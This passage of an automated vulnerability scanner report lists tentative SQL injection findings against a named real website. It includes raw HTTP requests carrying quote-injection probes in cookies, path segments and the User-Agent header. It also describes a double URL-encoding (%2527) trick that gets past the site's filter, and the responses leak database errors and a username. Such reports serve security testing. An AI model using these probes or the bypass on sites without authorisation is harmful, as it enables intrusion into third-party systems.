Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.71. http://www.analyticspros.com/blog/googleanalytics.feed [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.feed

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:34:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:34:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.72. http://www.analyticspros.com/blog/googleanalytics.feed [optimizelyEndUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.feed

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:26:54 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:26:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29089


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.73. http://www.analyticspros.com/blog/googleanalytics.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the 1ee73a388da0bb7ec3d7afe3beccac53 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics.html?type=atom HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:34:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html?type=atom HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:34:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:34:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:34:19 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.74. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog%2527/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:47:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog%2527%2527/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:47:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.75. http://www.analyticspros.com/blog/googleanalytics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.html'?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:48:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html''?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:48:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:48:45 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:48:45 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29851


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.76. http://www.analyticspros.com/blog/googleanalytics.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:45:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html?start=5 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:46:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:46:03 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:46:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.77. http://www.analyticspros.com/blog/googleanalytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:25:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:25:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2d14b64a6cbe67f6c9be7adeede1758a; path=/
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.78. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
